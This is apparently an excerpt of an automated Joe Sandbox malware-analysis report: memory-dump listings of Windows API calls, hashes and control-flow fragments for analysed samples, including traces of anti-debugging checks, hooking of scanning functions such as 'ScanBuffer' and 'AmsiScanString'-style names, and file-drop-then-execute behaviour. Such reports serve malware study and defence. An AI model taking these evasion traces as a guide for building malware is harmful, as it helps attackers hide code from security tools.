                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4102113445-0
                                                                                                                    • Opcode ID: c7943ed151928a281e7ff26cae3aa936b106ba6122b34431080070cdb08e6f79
                                                                                                                    • Instruction ID: 8e48db8808a9a2b00455a2f1b81d8f156d655ad4fadfc7561da1c9251d72294c
                                                                                                                    • Opcode Fuzzy Hash: c7943ed151928a281e7ff26cae3aa936b106ba6122b34431080070cdb08e6f79
                                                                                                                    • Instruction Fuzzy Hash: FF01A2B62442847FFF11BA64DD12B6A776DDB86710F6105A0F400A67C0D675DE008BB4
                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02D9ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D9AB2F
                                                                                                                      • Part of subcall function 02D9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D9A7E2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                    • Opcode ID: 5174306ac5f844e949e0b0b632ded3f6bdbb6dc591ba0c330ebd54afda2b3b39
                                                                                                                    • Instruction ID: 4e881c8d3c0cb642318f4060a1cd0493329d10056082a6b633dac3268c1ec5fd
                                                                                                                    • Opcode Fuzzy Hash: 5174306ac5f844e949e0b0b632ded3f6bdbb6dc591ba0c330ebd54afda2b3b39
                                                                                                                    • Instruction Fuzzy Hash: E941D37B7041084BDF11EB7988906BEB3EBDB86208F644526F492CB345EA35ED02CA75
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc
                                                                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                    • API String ID: 1883125708-1952140341
                                                                                                                    • Opcode ID: 4b1c0bcc23a312b2ef92a307332141ee665bfccc4588824a6a4527fd6b27bd1e
                                                                                                                    • Instruction ID: c24113dd9728dfbc18f89cf37ffcacefcbb447de99a598a789c80f9e6440c725
                                                                                                                    • Opcode Fuzzy Hash: 4b1c0bcc23a312b2ef92a307332141ee665bfccc4588824a6a4527fd6b27bd1e
                                                                                                                    • Instruction Fuzzy Hash: CEF06271A84704AFEB00EFA5EC21D69B7EEE74AB00B918870F800C3710D774AE109A74
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase,?,02DAFAEB,UacInitialize,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,Initialize), ref: 02DAF6EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02DAF700
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: IsDebuggerPresent$KernelBase
                                                                                                                    • API String ID: 1646373207-2367923768
                                                                                                                    • Opcode ID: 24cb8792cb1bf271635ad831aec202929aecc2428ecd6b37b36df4ec652720c9
                                                                                                                    • Instruction ID: c4420335d07fcb008beec04f10c416666c503c88173682bd236a7c249aa08727
                                                                                                                    • Opcode Fuzzy Hash: 24cb8792cb1bf271635ad831aec202929aecc2428ecd6b37b36df4ec652720c9
                                                                                                                    • Instruction Fuzzy Hash: 81D012B23503901DBF0073F42CD4D19038CC55452D7300FE0B022C67E2E5A7CC195168
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,02DBD10B,00000000,02DBD11E), ref: 02D9C47A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D9C48B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                    • Opcode ID: 00f082fdce1a71d77c8d6d0fcaae6398f8b1c6378f01a9fd62d8ee1b490c99e1
                                                                                                                    • Instruction ID: f20bd2a0beaf0cec1b08eedcb65976defc093db0110822f995ffaf7dfcde23b3
                                                                                                                    • Opcode Fuzzy Hash: 00f082fdce1a71d77c8d6d0fcaae6398f8b1c6378f01a9fd62d8ee1b490c99e1
                                                                                                                    • Instruction Fuzzy Hash: 6BD05EF4BA0744DAFF01AAB1A490635239CC34D310F404866F40157300E76AAC148F64
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D9E297
                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D9E2B3
                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D9E32A
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 02D9E353
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 920484758-0
                                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                    • Instruction ID: 6b625c1f0dbd3d85ccd19ee125f505e8490694a149c8693e3f18a169046a2a30
                                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                    • Instruction Fuzzy Hash: E141F775A012299BCF62DB58CD90BC9B3BDEB49315F0046D6F648A7312DA30AF808F60
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D9AD59
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D9AD7D
                                                                                                                    • GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D9AD98
                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D9AE2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3990497365-0
                                                                                                                    • Opcode ID: 7ee77be7212352bf979b7e80f9087e97392daf924b1dac41f6ab3e8ac028b5cc
                                                                                                                    • Instruction ID: a21b39cc3f4a4eb4ec1e8971c3a18c633d52e34f75b3ff41ab7690ceb90da002
                                                                                                                    • Opcode Fuzzy Hash: 7ee77be7212352bf979b7e80f9087e97392daf924b1dac41f6ab3e8ac028b5cc
                                                                                                                    • Instruction Fuzzy Hash: B341F571A402689BDF61DB68CC84BDAB7FDAB08304F4440E6B548E7341DB74AF848FA0
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D9AD59
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D9AD7D
                                                                                                                    • GetModuleFileNameA.KERNEL32(02D90000,?,00000105), ref: 02D9AD98
                                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D9AE2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3990497365-0
                                                                                                                    • Opcode ID: 6956bd601072a0395665c8cc2b7cf0819144f0f59b80262c0655d543b6497d00
                                                                                                                    • Instruction ID: 158bacee0c0720ad98d654937a339265eca259a1f377f5b4a2b2cc3a3c617aec
                                                                                                                    • Opcode Fuzzy Hash: 6956bd601072a0395665c8cc2b7cf0819144f0f59b80262c0655d543b6497d00
                                                                                                                    • Instruction Fuzzy Hash: 7C410771A402589BDF61DB68CC84BDAB7FDAB08304F4400E6B548E7341DB749E848FA0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 523c7d93cbcd476289444910467d3aa6167e731b31a057293729ab2c8d32c3f4
                                                                                                                    • Instruction ID: d92fad224b915ac39ab6538307d21652189c553a6b7474a8906e26e169033994
                                                                                                                    • Opcode Fuzzy Hash: 523c7d93cbcd476289444910467d3aa6167e731b31a057293729ab2c8d32c3f4
                                                                                                                    • Instruction Fuzzy Hash: 36A1D2B77106060BDF19AA7D9C803ADB2D6DBC5325F18827AF11DCB3C5EB68CD468650
                                                                                                                    APIs
                                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D995DA), ref: 02D99572
                                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D995DA), ref: 02D99578
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                                    • String ID: yyyy
                                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                                    • Opcode ID: d81f3712e107210b992f54a2f616c6c853d2ecbd5bbe870638401e3a23194dbc
                                                                                                                    • Instruction ID: c0a1577eb703637540579848d170d4dffb6a9d44deada7d17a5f0112cfb58114
                                                                                                                    • Opcode Fuzzy Hash: d81f3712e107210b992f54a2f616c6c853d2ecbd5bbe870638401e3a23194dbc
                                                                                                                    • Instruction Fuzzy Hash: AB214B71A042589FDF50EFA8C891AEEB3B9EF09710F4140A9F805E7351E630DE41CBA5
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02DA83C2), ref: 02DA83A4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                                                                    • API String ID: 3811539418-184458249
                                                                                                                    • Opcode ID: a77873fa4cc982736837346c1bf52eda994e8c099453f482222e2ad2a991a407
                                                                                                                    • Instruction ID: 96c5bec4b91571cde560bebf961d642ff2207eb91bdb9a74dfd0c94c86fcded5
                                                                                                                    • Opcode Fuzzy Hash: a77873fa4cc982736837346c1bf52eda994e8c099453f482222e2ad2a991a407
                                                                                                                    • Instruction Fuzzy Hash: 9F016971680304BFEB00EFA5EC61F5AB7EDEB09B00F918860BD05D6740D670AD559A24
                                                                                                                    APIs
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAAF58
                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02DAAF88
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 02DAAFA7
                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DAAFB3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Read$Write
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3448952669-0
                                                                                                                    • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                    • Instruction ID: cc37fdd7300610beb039bc0337995a838b23fe9e0a10f5aea4ae0d1aac7550fe
                                                                                                                    • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                    • Instruction Fuzzy Hash: 48214DB264061A9BDF14EE69CC90BAA77B9EB84351F004652FE1497380D738ED11CAA4

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:27.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:3.1%
                                                                                                                    Total number of Nodes:32
                                                                                                                    Total number of Limit Nodes:2

                                                                                                                    Callgraph

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID: %s\%s
                                                                                                                    • API String ID: 2742963760-4073750446
                                                                                                                    • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                    • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                    • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                    • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2992075992-0
                                                                                                                    • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                    • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                    • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                    • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611591150-0
                                                                                                                    • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                    • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                    • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                    • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                    • API String ID: 2803490479-2443507578
                                                                                                                    • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                    • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                    • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                    • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EntryPointfopenstrcmpstrcpy
